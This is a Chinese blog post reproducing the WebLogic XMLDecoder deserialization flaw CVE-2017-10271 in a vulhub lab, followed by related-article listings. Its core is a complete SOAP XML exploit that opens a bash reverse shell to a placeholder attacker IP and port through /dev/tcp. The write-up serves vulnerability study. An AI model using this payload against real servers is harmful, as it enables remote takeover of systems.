Weblogic XMLDecoder 远程代码执行漏洞复现 (CVE-2017-10271)

最新推荐文章于 2023-02-17 14:34:09 发布
最新推荐文章于 2023-02-17 14:34:09 发布
阅读量317 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47356348/article/details/125716506
版权

Weblogic XMLDecoder 远程代码执行漏洞复现 (CVE-2017-10271)

漏洞原理

CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。

漏洞触发位置:wls-wsat.war
漏洞触发URL:/wls-wsat/CoordinatorPortType(POST)
漏洞的本质:构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞

参考文章:

https://blog.csdn.net/he_and/article/details/90582262
https://blog.csdn.net/weixin_45694388/article/details/118601788

漏洞复现

环境:
docker环境下vulhub靶场

  1. 打开靶场环境
    在这里插入图片描述
    报404 ,没有网页,找到存在漏洞的网页

  2. 由于触发漏洞的url为:/wls-wsat/CoordinatorPortType
    于是访问 http://192.168.2.137:7001//wls-wsat/CoordinatorPortType
    在这里插入图片描述

  3. 抓包, 构造SOAP(XML)格式的请求,更改请求为post,请求头中修改Content-Type的对应值为text/xml POST 内容为以下poc

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/攻击机IP/攻击机端口 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述
复现成功。

Day_0713
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Boom!脑洞大爆炸的博客
11-11 1219
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
weblogic反序列化漏洞复现-XMLDecoder(CVE-2017-10271
yang1234567898的博客
04-21 1151
漏洞原因 WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 影响版本 10.3.6 12.1.3 12.2.1.1.0 12.2.1.2. 漏洞复现 启动vulhub靶场 看到上面的页面说明启动成功 先开启监听 然后发送下面的数据包(反弹语句需要编码): POST /wls-wsat/CoordinatorPortTy.
Weblogic XMLDecoder(CVE-2017-10271)反序列化漏洞复现
qq_40624810的博客
03-11 317
一、原理 Weblogic WLS 组件中存在XMLDecoder远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击 原理:该漏洞产生于WLS-WebServices这个核心组件中,因为它使用XMLDecoder来解析XML数据,直接构造payload,发送xml数据,即可利用该漏洞,上传webshell等等。 二、漏洞版本 10.3.6.0.0,12.2.1.1.0,12.2.1.2.0,12.1.3.0.0 三、漏洞搭建: 判断:通过中间件去判断 端口+/wls.
Weblogic CVE-2017-10271 漏洞复现
weixin_44533592的博客
03-05 460
Weblogic CVE-2017-10271 漏洞复现 漏洞简介 WebLogic XMLDecoder反序列化漏洞CVE-2017-10271WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击 影响范围 Oracle WebLogic Server10.3.6.0.0 Oracle WebLogic Server12.1.3.0.0 Oracle WebLogic Server12.2.1.1.0 Oracle W
WebLogic WLS远程执行漏洞(CVE-2017-10271)验证
12-18
一段小代码WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
Weblogic漏洞CVE -2017-10271解决方案-附件资源
03-02
Weblogic漏洞CVE -2017-10271解决方案-附件资源
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
Weblogic反序列化漏洞补丁(FMJJ),这是一个累积补丁,代号FMJJ
漏洞复现:Weblogic CVE-2017-10271
m_ing
07-02 395
前言:还不会复现的快来打我! 漏洞描述 WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 涉及版本 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 环境搭建 我们采用Vulhub搭建方便快捷。Vulhub是一个基于docker和docker-compose的漏洞环境集合,配合docker进行使用。 我们先康康怎么安装Vulhub 运行以下命令
WebLogic XMLDecoder反序列化漏洞CVE-2017-10271复现
box
04-16 305
WebLogic XMLDecoder反序列化漏洞CVE-2017-10271) 0x00 漏洞描述 2017年12月下旬,网上爆出weblogicWLS组件存在xmldecoder反序列化漏洞(cve-2017-10271),直接post构造的xml数据包即可rce。 0x01 受影响WebLogic版本 10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。 0x02 漏洞复现 靶机IP:192.168.190.136 攻击机:192.168.190.1 1、使
Weblogic XMLDecoder(CVE-2017-10271)反序列化漏洞复现
weixin_60329395的博客
07-27 486
WeblogicWLSSecurity组件对外提供服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。通过发送构造的xml数据能通过反弹shell拿到权限
weblogic远程调试XMLDecoder RCE CVE-2017-10271
weixin_38170561的博客
01-04 185
首先说一下远程调试的配置,首先在weblogic的启动文件加入如下配置,开启服务器远程调试端口就是9999: 第二步,建立一个java的空项目。 第三步将weblogic的所有jar包拷出来,放到一个文件中。 第四步把jar包导入idea的lib配置中 第五步添加一个remote,端口修改为9999 在加入的jar包打断点后,点击debug小瓢虫的图标就能进一步调试了 下面开始...
PHP环境 XML外部实体注入漏洞 XXE 漏洞复现
ADummy的博客
02-26 414
PHP环境 XML外部实体注入漏洞(XXE) by ADummy 0x00利用路线 ​ 构造XXE payload—>POST发送—>有回显(也有blind xxe 参考资料) 0x01漏洞介绍 ​ PHP环境 XML外部实体注入漏洞(XXE) 0x02漏洞复现 payload <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xx
Weblogic xmlDecoder反序列化漏洞
buffedon的博客
08-04 1643
Weblogic xmlDecoder反序列化漏洞Weblogic xmlDecoder漏洞分析CVE-2017-3506CVE-2017-10271环境搭建漏洞探测漏洞利用其他PoC Weblogic xmlDecoder CVE-2017-10271 影响版本 Weblogic < 10.3.6 ‘wls-wsatXMLDecoder 反序列化漏洞CVE-2017-10271) Oracle WebLogic Server12.2.1.1 Oracle WebLogic Server12.2
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)
Lucky1youzi的博客
01-02 160
weblogic相关漏洞复现
Weblogic CVE-2017-10271 XMLDecoder反序列化漏洞
读书 买花 长大
02-17 422
CVE-2017-10271
XMLDecoder 对xml文档的解析代码!
12-28 1567
public Object readObject() {  if (in == null) {     return null; }        if (handler == null) {            SAXParserFactory factory = SAXParserFactory.newInstance();            try {                S
cve-2017-10271漏洞复现
最新发布
06-28
CVE-2017-10271漏洞是Oracle WebLogic Server中的一个远程代码执行漏洞。攻击者可以通过发送特制的HTTP请求来利用该漏洞,从而在受影响的系统上执行任意代码。该漏洞已经被公开披露,并且已经有一些工具可以用来复现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值